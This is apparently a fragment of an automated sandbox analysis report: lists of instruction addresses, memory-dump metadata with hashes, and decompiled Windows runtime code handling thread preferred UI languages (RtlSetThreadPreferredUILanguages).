                                                                      0x00a2276e
                                                                      0x00a22773
                                                                      0x00a22773
                                                                      0x00a22776
                                                                      0x00a22778
                                                                      0x00a2277e
                                                                      0x00a2277e
                                                                      0x00a22781
                                                                      0x00a22781
                                                                      0x00a22783
                                                                      0x00a22784
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a65bd8
                                                                      0x00a65bde
                                                                      0x00a65be4
                                                                      0x00a65be6
                                                                      0x00a65be8
                                                                      0x00a65be9
                                                                      0x00a65bee
                                                                      0x00a65bf8
                                                                      0x00a65bff
                                                                      0x00a65c01
                                                                      0x00a65c04
                                                                      0x00a65c07
                                                                      0x00a65c0b
                                                                      0x00a65c0d
                                                                      0x00a65c0d
                                                                      0x00a65c15
                                                                      0x00a65c18
                                                                      0x00a65c1b
                                                                      0x00a65c1b
                                                                      0x00a65c1e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a228c3
                                                                      0x00a228c8
                                                                      0x00a228d2
                                                                      0x00a228d4
                                                                      0x00a228d8
                                                                      0x00a228db
                                                                      0x00a65c26
                                                                      0x00a65c28
                                                                      0x00a65c2d
                                                                      0x00a65c2d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a65c34
                                                                      0x00a65c36
                                                                      0x00a65c49
                                                                      0x00a65c4e
                                                                      0x00a65c54
                                                                      0x00a65c5b
                                                                      0x00a65c5d
                                                                      0x00a65c60
                                                                      0x00a22788
                                                                      0x00a22788
                                                                      0x00a2278b
                                                                      0x00a2278e
                                                                      0x00a2278e
                                                                      0x00a2278e
                                                                      0x00a22791
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a22756
                                                                      0x00a22750
                                                                      0x00000000
                                                                      0x00a22794
                                                                      0x00a22794
                                                                      0x00a22795
                                                                      0x00a22798
                                                                      0x00a22798
                                                                      0x00000000
                                                                      0x00a22734
                                                                      0x00a2272c
                                                                      0x00a22700
                                                                      0x00a225ef
                                                                      0x00a225ef
                                                                      0x00a225ef
                                                                      0x00a225f2
                                                                      0x00a225f8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a225fe
                                                                      0x00000000
                                                                      0x00a228e6
                                                                      0x00a228ec
                                                                      0x00a228ef
                                                                      0x00a228f5
                                                                      0x00a228f8
                                                                      0x00a228f8
                                                                      0x00000000
                                                                      0x00a228f8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a22866
                                                                      0x00a22866
                                                                      0x00a22876
                                                                      0x00a22879
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a227e0
                                                                      0x00a227e7
                                                                      0x00a227e9
                                                                      0x00a227eb
                                                                      0x00a65afd
                                                                      0x00000000
                                                                      0x00a65afd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a22633
                                                                      0x00a22638
                                                                      0x00a2263b
                                                                      0x00a2263c
                                                                      0x00a2263e
                                                                      0x00a22640
                                                                      0x00a22642
                                                                      0x00a22647
                                                                      0x00a22649
                                                                      0x00a2264e
                                                                      0x00a22650
                                                                      0x00a22653
                                                                      0x00a22659
                                                                      0x00a226a2
                                                                      0x00a226a7
                                                                      0x00a226ac
                                                                      0x00a226b2
                                                                      0x00a65b11
                                                                      0x00a65b15
                                                                      0x00a65b17
                                                                      0x00000000
                                                                      0x00a226b8
                                                                      0x00a226b8
                                                                      0x00a226ba
                                                                      0x00a227a6
                                                                      0x00a227a6
                                                                      0x00a227a9
                                                                      0x00a227ab
                                                                      0x00a227b9
                                                                      0x00a227b9
                                                                      0x00a227be
                                                                      0x00a227c1
                                                                      0x00a227c3
                                                                      0x00a227c5
                                                                      0x00a227c7
                                                                      0x00a65c74
                                                                      0x00a65c79
                                                                      0x00a65c79
                                                                      0x00a227c7
                                                                      0x00000000
                                                                      0x00a226c0
                                                                      0x00a226c0
                                                                      0x00a226c3
                                                                      0x00a226c6
                                                                      0x00a226c6
                                                                      0x00a226c9
                                                                      0x00a226c9
                                                                      0x00000000
                                                                      0x00a226c9
                                                                      0x00a226ba
                                                                      0x00a2265b
                                                                      0x00a2265b
                                                                      0x00a2265e
                                                                      0x00a22667
                                                                      0x00a2266d
                                                                      0x00a22677
                                                                      0x00a2267c
                                                                      0x00a2267f
                                                                      0x00a22681
                                                                      0x00a65b49
                                                                      0x00a65b4e
                                                                      0x00a227cd
                                                                      0x00a227d0
                                                                      0x00a227d1
                                                                      0x00a227d2
                                                                      0x00a227d4
                                                                      0x00a227dd
                                                                      0x00a22687
                                                                      0x00a22687
                                                                      0x00a2268a
                                                                      0x00a2268b
                                                                      0x00a2268e
                                                                      0x00a2268f
                                                                      0x00a22691
                                                                      0x00a22696
                                                                      0x00a22698
                                                                      0x00a2269d
                                                                      0x00a2269f
                                                                      0x00000000
                                                                      0x00a2269f
                                                                      0x00a22681
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a22846
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a22605
                                                                      0x00a2260a
                                                                      0x00a2260c
                                                                      0x00a22611
                                                                      0x00a22616
                                                                      0x00a22619
                                                                      0x00a22619
                                                                      0x00a2261e
                                                                      0x00000000
                                                                      0x00a22624
                                                                      0x00a22627
                                                                      0x00a22627
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a65b1f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a22894
                                                                      0x00a2289b
                                                                      0x00a2289d
                                                                      0x00a228a1
                                                                      0x00a65b2b
                                                                      0x00a65b2e
                                                                      0x00a65b2e
                                                                      0x00a228a7
                                                                      0x00a228a9
                                                                      0x00a65b04
                                                                      0x00a65b09
                                                                      0x00a65b09
                                                                      0x00a65b09
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a65b35
                                                                      0x00a65b3c
                                                                      0x00a228fb
                                                                      0x00a228fb
                                                                      0x00a226cc
                                                                      0x00a226cc
                                                                      0x00a226d0
                                                                      0x00000000
                                                                      0x00a226d2
                                                                      0x00a226d2
                                                                      0x00000000
                                                                      0x00a226d2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a225fe
                                                                      0x00a2292d
                                                                      0x00a2292f
                                                                      0x00a22930
                                                                      0x00a22935
                                                                      0x00a22937
                                                                      0x00a2293c
                                                                      0x00a2293e
                                                                      0x00a2293f
                                                                      0x00a22944
                                                                      0x00a22947
                                                                      0x00a2294c
                                                                      0x00a2294e
                                                                      0x00a2294f
                                                                      0x00a22950
                                                                      0x00a22957
                                                                      0x00a22958
                                                                      0x00a2295a
                                                                      0x00a22962
                                                                      0x00a22963
                                                                      0x00a22968
                                                                      0x00a2296b
                                                                      0x00a22972
                                                                      0x00a22973
                                                                      0x00a22974
                                                                      0x00a2297b
                                                                      0x00a2297e
                                                                      0x00a2297f
                                                                      0x00a22980
                                                                      0x00a22981
                                                                      0x00a22982
                                                                      0x00a22983
                                                                      0x00a22984
                                                                      0x00a22985
                                                                      0x00a22986
                                                                      0x00a22987
                                                                      0x00a22988
                                                                      0x00a22989
                                                                      0x00a2298a
                                                                      0x00a2298b
                                                                      0x00a2298c
                                                                      0x00a2298d
                                                                      0x00a2298e
                                                                      0x00a2298f
                                                                      0x00a22990
                                                                      0x00a22992
                                                                      0x00a22997
                                                                      0x00a229a3
                                                                      0x00a229a6
                                                                      0x00a229ab
                                                                      0x00a229ad
                                                                      0x00a229b0
                                                                      0x00a229b2
                                                                      0x00a65c80
                                                                      0x00a229b8
                                                                      0x00a229b8
                                                                      0x00a229bb
                                                                      0x00a229c0
                                                                      0x00a229c5
                                                                      0x00a229c6
                                                                      0x00a229c6
                                                                      0x00a229c9
                                                                      0x00a229cb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a229cd
                                                                      0x00a229d0
                                                                      0x00a229d9
                                                                      0x00a229db
                                                                      0x00a229dd
                                                                      0x00a22a7f
                                                                      0x00a22a84
                                                                      0x00a22a87
                                                                      0x00a22a89
                                                                      0x00a65ca1
                                                                      0x00a65ca3
                                                                      0x00000000
                                                                      0x00a22a8f
                                                                      0x00a22a8f
                                                                      0x00000000
                                                                      0x00a22a8f
                                                                      0x00000000
                                                                      0x00a229e3
                                                                      0x00a229e3
                                                                      0x00a229e3
                                                                      0x00000000
                                                                      0x00a229e3
                                                                      0x00a229dd
                                                                      0x00000000
                                                                      0x00a229db
                                                                      0x00a229e6
                                                                      0x00a229e9
                                                                      0x00a229eb
                                                                      0x00a229ed
                                                                      0x00a229f3
                                                                      0x00a229f5
                                                                      0x00a229f8
                                                                      0x00a229fa
                                                                      0x00a22a97
                                                                      0x00a22a9a
                                                                      0x00a22a9d
                                                                      0x00a22add
                                                                      0x00000000
                                                                      0x00a22a9f
                                                                      0x00a22aa2
                                                                      0x00a22aa5
                                                                      0x00a22aa8
                                                                      0x00a22aab
                                                                      0x00a65cab
                                                                      0x00a65caf
                                                                      0x00a65cc5
                                                                      0x00a65cda
                                                                      0x00a65cdc
                                                                      0x00a65cdf
                                                                      0x00a65ce5
                                                                      0x00000000
                                                                      0x00a65ceb
                                                                      0x00a65ced
                                                                      0x00a65cee
                                                                      0x00000000
                                                                      0x00a65cee
                                                                      0x00a65cb1
                                                                      0x00a65cb4
                                                                      0x00a65cb9
                                                                      0x00a65cbb
                                                                      0x00000000
                                                                      0x00a65cbd
                                                                      0x00a65cbd
                                                                      0x00000000
                                                                      0x00a65cbd
                                                                      0x00a65cbb
                                                                      0x00a22ab1
                                                                      0x00a22ab1
                                                                      0x00a22ac4
                                                                      0x00a22ac6
                                                                      0x00a22ac6
                                                                      0x00000000
                                                                      0x00a22ac6
                                                                      0x00a22aab
                                                                      0x00000000
                                                                      0x00a22a00
                                                                      0x00a22a09
                                                                      0x00a22a0e
                                                                      0x00a22a21
                                                                      0x00a22a24
                                                                      0x00a22a35
                                                                      0x00a22a3a
                                                                      0x00a22a3d
                                                                      0x00a22a42
                                                                      0x00a22a59
                                                                      0x00a22a59
                                                                      0x00a22a5c
                                                                      0x00a22a5f
                                                                      0x00a22a5f
                                                                      0x00a229fa
                                                                      0x00a229f3
                                                                      0x00a22a64
                                                                      0x00a22a64
                                                                      0x00a22a6b
                                                                      0x00a22a6b
                                                                      0x00a22a6d
                                                                      0x00a22a72
                                                                      0x00a22a72
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PATH
                                                                      • API String ID: 0-1036084923
                                                                      • Opcode ID: dca4e201fe185f24d81b71e81bad042a51e8a891e97643b5328c3ca8eb4bd5ac
                                                                      • Instruction ID: 9598777972d0f44cbeb8900a3af7bd4805fa0a4eafe3336e5e850302caf8acec
                                                                      • Opcode Fuzzy Hash: dca4e201fe185f24d81b71e81bad042a51e8a891e97643b5328c3ca8eb4bd5ac
                                                                      • Instruction Fuzzy Hash: 55C16F72E04229AFCB25DFADE981BADB7B5FF48700F144029F415AB2A0D734A941DB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 80%
                                                                      			E00A2FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                                      				char _v5;
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				char _v16;
                                                                      				char _v17;
                                                                      				char _v20;
                                                                      				signed int _v24;
                                                                      				char _v28;
                                                                      				char _v32;
                                                                      				signed int _v40;
                                                                      				void* __ecx;
                                                                      				void* __edi;
                                                                      				void* __ebp;
                                                                      				signed int _t73;
                                                                      				intOrPtr* _t75;
                                                                      				signed int _t77;
                                                                      				signed int _t79;
                                                                      				signed int _t81;
                                                                      				intOrPtr _t83;
                                                                      				intOrPtr _t85;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t91;
                                                                      				signed int _t94;
                                                                      				signed int _t95;
                                                                      				signed int _t96;
                                                                      				signed int _t106;
                                                                      				signed int _t108;
                                                                      				signed int _t114;
                                                                      				signed int _t116;
                                                                      				signed int _t118;
                                                                      				signed int _t122;
                                                                      				signed int _t123;
                                                                      				void* _t129;
                                                                      				signed int _t130;
                                                                      				void* _t132;
                                                                      				intOrPtr* _t134;
                                                                      				signed int _t138;
                                                                      				signed int _t141;
                                                                      				signed int _t147;
                                                                      				intOrPtr _t153;
                                                                      				signed int _t154;
                                                                      				signed int _t155;
                                                                      				signed int _t170;
                                                                      				void* _t174;
                                                                      				signed int _t176;
                                                                      				signed int _t177;
                                                                      
                                                                      				_t129 = __ebx;
                                                                      				_push(_t132);
                                                                      				_push(__esi);
                                                                      				_t174 = _t132;
                                                                      				_t73 =  !( *( *(_t174 + 0x18)));
                                                                      				if(_t73 >= 0) {
                                                                      					L5:
                                                                      					return _t73;
                                                                      				} else {
                                                                      					E00A0EEF0(0xae7b60);
                                                                      					_t134 =  *0xae7b84; // 0x77f07b80
                                                                      					_t2 = _t174 + 0x24; // 0x24
                                                                      					_t75 = _t2;
                                                                      					if( *_t134 != 0xae7b80) {
                                                                      						_push(3);
                                                                      						asm("int 0x29");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						_push(0xae7b60);
                                                                      						_t170 = _v8;
                                                                      						_v28 = 0;
                                                                      						_v40 = 0;
                                                                      						_v24 = 0;
                                                                      						_v17 = 0;
                                                                      						_v32 = 0;
                                                                      						__eflags = _t170 & 0xffff7cf2;
                                                                      						if((_t170 & 0xffff7cf2) != 0) {
                                                                      							L43:
                                                                      							_t77 = 0xc000000d;
                                                                      						} else {
                                                                      							_t79 = _t170 & 0x0000000c;
                                                                      							__eflags = _t79;
                                                                      							if(_t79 != 0) {
                                                                      								__eflags = _t79 - 0xc;
                                                                      								if(_t79 == 0xc) {
                                                                      									goto L43;
                                                                      								} else {
                                                                      									goto L9;
                                                                      								}
                                                                      							} else {
                                                                      								_t170 = _t170 | 0x00000008;
                                                                      								__eflags = _t170;
                                                                      								L9:
                                                                      								_t81 = _t170 & 0x00000300;
                                                                      								__eflags = _t81 - 0x300;
                                                                      								if(_t81 == 0x300) {
                                                                      									goto L43;
                                                                      								} else {
                                                                      									_t138 = _t170 & 0x00000001;
                                                                      									__eflags = _t138;
                                                                      									_v24 = _t138;
                                                                      									if(_t138 != 0) {
                                                                      										__eflags = _t81;
                                                                      										if(_t81 != 0) {
                                                                      											goto L43;
                                                                      										} else {
                                                                      											goto L11;
                                                                      										}
                                                                      									} else {
                                                                      										L11:
                                                                      										_push(_t129);
                                                                      										_t77 = E00A06D90( &_v20);
                                                                      										_t130 = _t77;
                                                                      										__eflags = _t130;
                                                                      										if(_t130 >= 0) {
                                                                      											_push(_t174);
                                                                      											__eflags = _t170 & 0x00000301;
                                                                      											if((_t170 & 0x00000301) == 0) {
                                                                      												_t176 = _a8;
                                                                      												__eflags = _t176;
                                                                      												if(__eflags == 0) {
                                                                      													L64:
                                                                      													_t83 =  *[fs:0x18];
                                                                      													_t177 = 0;
                                                                      													__eflags =  *(_t83 + 0xfb8);
                                                                      													if( *(_t83 + 0xfb8) != 0) {
                                                                      														E00A076E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                                      														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                                      													}
                                                                      													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                                      													goto L15;
                                                                      												} else {
                                                                      													asm("sbb edx, edx");
                                                                      													_t114 = E00A98938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                                      													__eflags = _t114;
                                                                      													if(_t114 < 0) {
                                                                      														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                                      														E009FB150();
                                                                      													}
                                                                      													_t116 = E00A96D81(_t176,  &_v16);
                                                                      													__eflags = _t116;
                                                                      													if(_t116 >= 0) {
                                                                      														__eflags = _v16 - 2;
                                                                      														if(_v16 < 2) {
                                                                      															L56:
                                                                      															_t118 = E00A075CE(_v20, 5, 0);
                                                                      															__eflags = _t118;
                                                                      															if(_t118 < 0) {
                                                                      																L67:
                                                                      																_t130 = 0xc0000017;
                                                                      																goto L32;
                                                                      															} else {
                                                                      																__eflags = _v12;
                                                                      																if(_v12 == 0) {
                                                                      																	goto L67;
                                                                      																} else {
                                                                      																	_t153 =  *0xae8638; // 0x0
                                                                      																	_t122 = L00A038A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                                      																	_t154 = _v12;
                                                                      																	_t130 = _t122;
                                                                      																	__eflags = _t130;
                                                                      																	if(_t130 >= 0) {
                                                                      																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                                      																		__eflags = _t123;
                                                                      																		if(_t123 != 0) {
                                                                      																			_t155 = _a12;
                                                                      																			__eflags = _t155;
                                                                      																			if(_t155 != 0) {
                                                                      																				 *_t155 = _t123;
                                                                      																			}
                                                                      																			goto L64;
                                                                      																		} else {
                                                                      																			E00A076E2(_t154);
                                                                      																			goto L41;
                                                                      																		}
                                                                      																	} else {
                                                                      																		E00A076E2(_t154);
                                                                      																		_t177 = 0;
                                                                      																		goto L18;
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														} else {
                                                                      															__eflags =  *_t176;
                                                                      															if( *_t176 != 0) {
                                                                      																goto L56;
                                                                      															} else {
                                                                      																__eflags =  *(_t176 + 2);
                                                                      																if( *(_t176 + 2) == 0) {
                                                                      																	goto L64;
                                                                      																} else {
                                                                      																	goto L56;
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													} else {
                                                                      														_t130 = 0xc000000d;
                                                                      														goto L32;
                                                                      													}
                                                                      												}
                                                                      												goto L35;
                                                                      											} else {
                                                                      												__eflags = _a8;
                                                                      												if(_a8 != 0) {
                                                                      													_t77 = 0xc000000d;
                                                                      												} else {
                                                                      													_v5 = 1;
                                                                      													L00A2FCE3(_v20, _t170);
                                                                      													_t177 = 0;
                                                                      													__eflags = 0;
                                                                      													L15:
                                                                      													_t85 =  *[fs:0x18];
                                                                      													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                                      													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                                      														L18:
                                                                      														__eflags = _t130;
                                                                      														if(_t130 != 0) {
                                                                      															goto L32;
                                                                      														} else {
                                                                      															__eflags = _v5 - _t130;
                                                                      															if(_v5 == _t130) {
                                                                      																goto L32;
                                                                      															} else {
                                                                      																_t86 =  *[fs:0x18];
                                                                      																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                                      																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                                      																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                                      																}
                                                                      																__eflags = _t177;
                                                                      																if(_t177 == 0) {
                                                                      																	L31:
                                                                      																	__eflags = 0;
                                                                      																	L00A070F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                                      																	goto L32;
                                                                      																} else {
                                                                      																	__eflags = _v24;
                                                                      																	_t91 =  *(_t177 + 0x20);
                                                                      																	if(_v24 != 0) {
                                                                      																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                                      																		goto L31;
                                                                      																	} else {
                                                                      																		_t141 = _t91 & 0x00000040;
                                                                      																		__eflags = _t170 & 0x00000100;
                                                                      																		if((_t170 & 0x00000100) == 0) {
                                                                      																			__eflags = _t141;
                                                                      																			if(_t141 == 0) {
                                                                      																				L74:
                                                                      																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                                      																				goto L27;
                                                                      																			} else {
                                                                      																				_t177 = E00A2FD22(_t177);
                                                                      																				__eflags = _t177;
                                                                      																				if(_t177 == 0) {
                                                                      																					goto L42;
                                                                      																				} else {
                                                                      																					_t130 = E00A2FD9B(_t177, 0, 4);
                                                                      																					__eflags = _t130;
                                                                      																					if(_t130 != 0) {
                                                                      																						goto L42;
                                                                      																					} else {
                                                                      																						_t68 = _t177 + 0x20;
                                                                      																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                                      																						__eflags =  *_t68;
                                                                      																						_t91 =  *(_t177 + 0x20);
                                                                      																						goto L74;
                                                                      																					}
                                                                      																				}
                                                                      																			}
                                                                      																			goto L35;
                                                                      																		} else {
                                                                      																			__eflags = _t141;
                                                                      																			if(_t141 != 0) {
                                                                      																				_t177 = E00A2FD22(_t177);
                                                                      																				__eflags = _t177;
                                                                      																				if(_t177 == 0) {
                                                                      																					L42:
                                                                      																					_t77 = 0xc0000001;
                                                                      																					goto L33;
                                                                      																				} else {
                                                                      																					_t130 = E00A2FD9B(_t177, 0, 4);
                                                                      																					__eflags = _t130;
                                                                      																					if(_t130 != 0) {
                                                                      																						goto L42;
                                                                      																					} else {
                                                                      																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                                      																						_t91 =  *(_t177 + 0x20);
                                                                      																						goto L26;
                                                                      																					}
                                                                      																				}
                                                                      																				goto L35;
                                                                      																			} else {
                                                                      																				L26:
                                                                      																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                                      																				__eflags = _t94;
                                                                      																				L27:
                                                                      																				 *(_t177 + 0x20) = _t94;
                                                                      																				__eflags = _t170 & 0x00008000;
                                                                      																				if((_t170 & 0x00008000) != 0) {
                                                                      																					_t95 = _a12;
                                                                      																					__eflags = _t95;
                                                                      																					if(_t95 != 0) {
                                                                      																						_t96 =  *_t95;
                                                                      																						__eflags = _t96;
                                                                      																						if(_t96 != 0) {
                                                                      																							 *((short*)(_t177 + 0x22)) = 0;
                                                                      																							_t40 = _t177 + 0x20;
                                                                      																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                                      																							__eflags =  *_t40;
                                                                      																						}
                                                                      																					}
                                                                      																				}
                                                                      																				goto L31;
                                                                      																			}
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													} else {
                                                                      														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                                      														_t106 =  *(_t147 + 0x20);
                                                                      														__eflags = _t106 & 0x00000040;
                                                                      														if((_t106 & 0x00000040) != 0) {
                                                                      															_t147 = E00A2FD22(_t147);
                                                                      															__eflags = _t147;
                                                                      															if(_t147 == 0) {
                                                                      																L41:
                                                                      																_t130 = 0xc0000001;
                                                                      																L32:
                                                                      																_t77 = _t130;
                                                                      																goto L33;
                                                                      															} else {
                                                                      																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                                      																_t106 =  *(_t147 + 0x20);
                                                                      																goto L17;
                                                                      															}
                                                                      															goto L35;
                                                                      														} else {
                                                                      															L17:
                                                                      															_t108 = _t106 | 0x00000080;
                                                                      															__eflags = _t108;
                                                                      															 *(_t147 + 0x20) = _t108;
                                                                      															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                                      															goto L18;
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      											L33:
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L35:
                                                                      						return _t77;
                                                                      					} else {
                                                                      						 *_t75 = 0xae7b80;
                                                                      						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                                      						 *_t134 = _t75;
                                                                      						 *0xae7b84 = _t75;
                                                                      						_t73 = E00A0EB70(_t134, 0xae7b60);
                                                                      						if( *0xae7b20 != 0) {
                                                                      							_t73 =  *( *[fs:0x30] + 0xc);
                                                                      							if( *((char*)(_t73 + 0x28)) == 0) {
                                                                      								_t73 = E00A0FF60( *0xae7b20);
                                                                      							}
                                                                      						}
                                                                      						goto L5;
                                                                      					}
                                                                      				}
                                                                      			}

















































                                                                      0x00a2fab0
                                                                      0x00a2fab2
                                                                      0x00a2fab3
                                                                      0x00a2fab4
                                                                      0x00a2fabc
                                                                      0x00a2fac0
                                                                      0x00a2fb14
                                                                      0x00a2fb17
                                                                      0x00a2fac2
                                                                      0x00a2fac8
                                                                      0x00a2facd
                                                                      0x00a2fad3
                                                                      0x00a2fad3
                                                                      0x00a2fadd
                                                                      0x00a2fb18
                                                                      0x00a2fb1b
                                                                      0x00a2fb1d
                                                                      0x00a2fb1e
                                                                      0x00a2fb1f
                                                                      0x00a2fb20
                                                                      0x00a2fb21
                                                                      0x00a2fb22
                                                                      0x00a2fb23
                                                                      0x00a2fb24
                                                                      0x00a2fb25
                                                                      0x00a2fb26
                                                                      0x00a2fb27
                                                                      0x00a2fb28
                                                                      0x00a2fb29
                                                                      0x00a2fb2a
                                                                      0x00a2fb2b
                                                                      0x00a2fb2c
                                                                      0x00a2fb2d
                                                                      0x00a2fb2e
                                                                      0x00a2fb2f
                                                                      0x00a2fb3a
                                                                      0x00a2fb3b
                                                                      0x00a2fb3e
                                                                      0x00a2fb41
                                                                      0x00a2fb44
                                                                      0x00a2fb47
                                                                      0x00a2fb4a
                                                                      0x00a2fb4d
                                                                      0x00a2fb53
                                                                      0x00a6bdcb
                                                                      0x00a6bdcb
                                                                      0x00a2fb59
                                                                      0x00a2fb5b
                                                                      0x00a2fb5b
                                                                      0x00a2fb5e
                                                                      0x00a6bdd5
                                                                      0x00a6bdd8
                                                                      0x00000000
                                                                      0x00a6bdda
                                                                      0x00000000
                                                                      0x00a6bdda
                                                                      0x00a2fb64
                                                                      0x00a2fb64
                                                                      0x00a2fb64
                                                                      0x00a2fb67
                                                                      0x00a2fb6e
                                                                      0x00a2fb70
                                                                      0x00a2fb72
                                                                      0x00000000
                                                                      0x00a2fb78
                                                                      0x00a2fb7a
                                                                      0x00a2fb7a
                                                                      0x00a2fb7d
                                                                      0x00a2fb80
                                                                      0x00a6bddf
                                                                      0x00a6bde1
                                                                      0x00000000
                                                                      0x00a6bde3
                                                                      0x00000000
                                                                      0x00a6bde3
                                                                      0x00a2fb86
                                                                      0x00a2fb86
                                                                      0x00a2fb86
                                                                      0x00a2fb8b
                                                                      0x00a2fb90
                                                                      0x00a2fb92
                                                                      0x00a2fb94
                                                                      0x00a2fb9a
                                                                      0x00a2fb9b
                                                                      0x00a2fba1
                                                                      0x00a6bde8
                                                                      0x00a6bdeb
                                                                      0x00a6bded
                                                                      0x00a6beb5
                                                                      0x00a6beb5
                                                                      0x00a6bebb
                                                                      0x00a6bebd
                                                                      0x00a6bec3
                                                                      0x00a6bed2
                                                                      0x00a6bedd
                                                                      0x00a6bedd
                                                                      0x00a6beed
                                                                      0x00000000
                                                                      0x00a6bdf3
                                                                      0x00a6bdfe
                                                                      0x00a6be06
                                                                      0x00a6be0b
                                                                      0x00a6be0d
                                                                      0x00a6be0f
                                                                      0x00a6be14
                                                                      0x00a6be19
                                                                      0x00a6be20
                                                                      0x00a6be25
                                                                      0x00a6be27
                                                                      0x00a6be35
                                                                      0x00a6be39
                                                                      0x00a6be46
                                                                      0x00a6be4f
                                                                      0x00a6be54
                                                                      0x00a6be56
                                                                      0x00a6bef8
                                                                      0x00a6bef8
                                                                      0x00000000
                                                                      0x00a6be5c
                                                                      0x00a6be5c
                                                                      0x00a6be60
                                                                      0x00000000
                                                                      0x00a6be66
                                                                      0x00a6be66
                                                                      0x00a6be7f
                                                                      0x00a6be84
                                                                      0x00a6be87
                                                                      0x00a6be89
                                                                      0x00a6be8b
                                                                      0x00a6be99
                                                                      0x00a6be9d
                                                                      0x00a6bea0
                                                                      0x00a6beac
                                                                      0x00a6beaf
                                                                      0x00a6beb1
                                                                      0x00a6beb3
                                                                      0x00a6beb3
                                                                      0x00000000
                                                                      0x00a6bea2
                                                                      0x00a6bea2
                                                                      0x00000000
                                                                      0x00a6bea2
                                                                      0x00a6be8d
                                                                      0x00a6be8d
                                                                      0x00a6be92
                                                                      0x00000000
                                                                      0x00a6be92
                                                                      0x00a6be8b
                                                                      0x00a6be60
                                                                      0x00a6be3b
                                                                      0x00a6be3b
                                                                      0x00a6be3e
                                                                      0x00000000
                                                                      0x00a6be40
                                                                      0x00a6be40
                                                                      0x00a6be44
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a6be44
                                                                      0x00a6be3e
                                                                      0x00a6be29
                                                                      0x00a6be29
                                                                      0x00000000
                                                                      0x00a6be29
                                                                      0x00a6be27
                                                                      0x00000000
                                                                      0x00a2fba7
                                                                      0x00a2fba7
                                                                      0x00a2fbab
                                                                      0x00a6bf02
                                                                      0x00a2fbb1
                                                                      0x00a2fbb1
                                                                      0x00a2fbb8
                                                                      0x00a2fbbd
                                                                      0x00a2fbbd
                                                                      0x00a2fbbf
                                                                      0x00a2fbbf
                                                                      0x00a2fbc5
                                                                      0x00a2fbcb
                                                                      0x00a2fbf8
                                                                      0x00a2fbf8
                                                                      0x00a2fbfa
                                                                      0x00000000
                                                                      0x00a2fc00
                                                                      0x00a2fc00
                                                                      0x00a2fc03
                                                                      0x00000000
                                                                      0x00a2fc09
                                                                      0x00a2fc09
                                                                      0x00a2fc0f
                                                                      0x00a2fc15
                                                                      0x00a2fc23
                                                                      0x00a2fc23
                                                                      0x00a2fc25
                                                                      0x00a2fc27
                                                                      0x00a2fc75
                                                                      0x00a2fc7c
                                                                      0x00a2fc84
                                                                      0x00000000
                                                                      0x00a2fc29
                                                                      0x00a2fc29
                                                                      0x00a2fc2d
                                                                      0x00a2fc30
                                                                      0x00a6bf0f
